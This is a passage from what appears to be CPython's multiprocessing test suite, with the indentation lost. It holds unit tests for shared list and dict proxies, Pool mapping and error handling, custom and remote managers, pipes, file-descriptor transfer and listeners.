self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
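# Helper functions for the Pool tests. They are defined at module level
# so that they can be pickled and sent to worker processes.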
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
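# Tracks the number of live instances so that test_release_task_refs can
# verify the pool does not keep task arguments or results alive.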
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
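# exception_throwing_generator() yields ints but raises SayWhenError at
# index `when` (immediately if when == -1); the Pool tests use it to
# exercise the error paths of map(), imap() and imap_unordered().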
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
            # exiting the with block calls pool.terminate()
        # the pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
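# Helpers for _TestPoolWorkerErrors: raising() always fails, while
# unpickleable_result() returns a lambda that cannot be pickled back to
# the parent process.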
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
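# Proxy type exposing only __next__, so that the generator returned by
# baz() can be iterated from the client side of the manager.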
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
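# A minimal sketch (hypothetical address and key) of the split exercised
# below: the serving process registers 'get_queue' with a callable, while
# clients register the same typeid with no callable and use connect()
# instead of start():
#
#   server = QueueManager(address=('', 50000), authkey=b'secret',
#                         serializer='xmlrpclib')
#   server.start()
#   client = QueueManager2(address=('127.0.0.1', 50000), authkey=b'secret',
#                          serializer='xmlrpclib')
#   client.connect()
#   q = client.get_queue()         # proxy for the server-side Queue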
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib deserializes the tuple as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
